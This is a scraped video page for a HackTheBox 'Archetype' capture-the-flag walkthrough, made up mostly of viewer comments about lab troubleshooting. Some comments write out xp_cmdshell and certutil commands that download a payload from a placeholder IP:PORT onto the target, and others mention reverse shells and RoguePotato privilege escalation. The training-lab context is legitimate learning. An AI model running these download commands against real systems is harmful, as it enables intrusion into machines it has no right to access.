Tier 2: Archetype - HackTheBox Starting Point - Full Walkthrough

Tier 2: Archetype - HackTheBox Starting Point - Full Walkthrough

CryptoCat

2 года назад

33,638 Просмотров

Ссылки и html тэги не поддерживаются


Комментарии:

@MAG320
@MAG320 - 27.09.2023 00:37

I know its a year later, but I can't seem to ping the connection. I am connected using the Starting Point openVPN but it is still not working.

Ответить
@GruntSec
@GruntSec - 06.08.2023 05:18

Your videos are so damn good man. I would pay for this content. Between the Practical Ethical Hacking course from TCM Security, and watching and taking notes during these videos, I have learned soo much. Thank you so much for creating such great content and doing it in a way that is approachable to people learning about this. You are an amazing resource in this community. I wish I lived overseas so I could buy you a pint!

Ответить
@byrospyro4432
@byrospyro4432 - 03.06.2023 22:12

just a heads up wget wasn't working for me on the host machine I tried with:

xp_cmdshell "powershell -c cd C:\Users\Public; certutil -urlcache -f IP:PORT/payload.exe payload.exe

and that was buggy as well

Ответить
@Vex7eX
@Vex7eX - 09.05.2023 06:01

Excellent tutorial! Thank you!!!

Ответить
@RobbieDrake-ud4rh
@RobbieDrake-ud4rh - 01.03.2023 15:50

do you do actual write ups of these videos, Thanks

Ответить
@harsherx
@harsherx - 30.01.2023 18:45

Your the best around nothing's ever gonna bring you down.

Ответить
@dhruvkothari7530
@dhruvkothari7530 - 14.01.2023 18:31

Mine is giving me error - login failed for user 'ARCHETYPE\Guest'
I tried so many times but nothing is happening.
What should i do ?

Ответить
@lasersac8953
@lasersac8953 - 15.10.2022 23:57

Hey im having trouble with the wget i tried different ways to download too but i get the 200 code but after a long while on the windows server it just gives me a time out without actually downloading the file. when i dir it has 0 bytes

Ответить
@periyamaruthuk1785
@periyamaruthuk1785 - 08.10.2022 23:13

Hi Mate... Hope you are doing good... You have done a real hard work to customize and categorize all the payloads... If possible... can you share the Payloads which you have categorized... it help us to explore more information by pointing to the right payloads... Hope you got my point... Thanks in Advance...😊

Ответить
@championchunk6623
@championchunk6623 - 11.09.2022 18:40

What amazing waikthrough. i love the way you teach us. I want to ask you where you got all this Vulnerability payload and script, any GitHub repository? Please share!

Ответить
@robertdobrzenski5250
@robertdobrzenski5250 - 19.08.2022 09:51

My payload comes up as 0 bytes when I dir it using sql client. What gives?

Ответить
@hing62610
@hing62610 - 03.08.2022 01:48

Thank you very much for the walkthrough. I have learnt so much! Please keep on doing the wonderful work.

I would like to ask some noob questions:
Why can't we login the administrator with mssqlclient but be able to login with psexec or evil-winrm?

They are all connecting to port 1433. I cannot understand the difference.

When I tried to use psexec to login sql_svc, it showed the smb files stating not writable. This confused me with smbclient.

Ответить
@devonburelle400
@devonburelle400 - 16.06.2022 07:28

This one took me forever but I learned a lot, getting those last 2 flags felt amazing!

Ответить
@kylejf9059
@kylejf9059 - 06.06.2022 01:42

Many thanks. Wasn't sure how to use the SQL commands but your video was ridiculously helpful again. I knew what I wanted to do, just wasn't sure how!

Anyway, wget wouldn't work for me using PWNBOX but "certutil -urlcache -f *IP:port*/file.exe file.exe" did. In case anyone has any problems trying to chain wget in the powershell commands.

I found the password myself also but it wasn't listed same as you, it was way above I actually stopped following once I got my files uploaded as you'd helped me enough.

Many thanks once again and I expect I'll be saying this again as I progress and find myself stuck 👍🏻👍🏻👍🏻

Ответить
@walnuts312
@walnuts312 - 05.06.2022 18:29

Just ran through this recently, and WinPeas did not return the file containing the admin password as demonstrated. The file didn't exist on the system for some reason. I had to use RoguePotato to get to the admin flag. Just a heads up in case someone hits the same wall I did

Ответить
@user-ot4hh5xi4n
@user-ot4hh5xi4n - 05.05.2022 22:10

Help it says "unable to connect to the remote server"

Ответить
@sxmourai6897
@sxmourai6897 - 23.04.2022 12:35

I use kali and I can't find winPEAS can someone help me ?

Ответить
@kdrag7560
@kdrag7560 - 04.03.2022 19:47

Oh mister holy hackerman. What do i do when i cant transfer the payload because wget says it doesn't exist? On my listener it shows a message that the server used the get command error 404 file not found. What did i do wrong? I followed your video exacly. :(

Ответить
@julienmasse8898
@julienmasse8898 - 02.03.2022 20:41

locate doesnt work here

Ответить
@Zephyr-tg9hu
@Zephyr-tg9hu - 28.02.2022 09:56

Just finished this one. I was surprised to see that the intended solution was to spawn a reverse shell! When I got access to the MS SQL server I noticed I could still run dir with the xp_cmdshell so I dir'ed my way through the whole thing 😂

Ответить
@junaidjaved4792
@junaidjaved4792 - 07.02.2022 21:36

Now thats alot of information thanku so much keep the good work up. 😍😍😍

Ответить
@d1qqn121
@d1qqn121 - 14.01.2022 17:05

Thank you for explaining the alternatives!

keep it up

Ответить
@aaryanbhagat4852
@aaryanbhagat4852 - 06.01.2022 17:38

Great walkthrough.

Ответить
@sunilprashanth4087
@sunilprashanth4087 - 05.01.2022 20:20

Just now saw your playlist, it's really well explained... Keep hacking and post more videos💚✨

Ответить
@aryanpatel2188
@aryanpatel2188 - 05.01.2022 19:06

Nice work.....good job....keep it up..... ❣️❣️

Ответить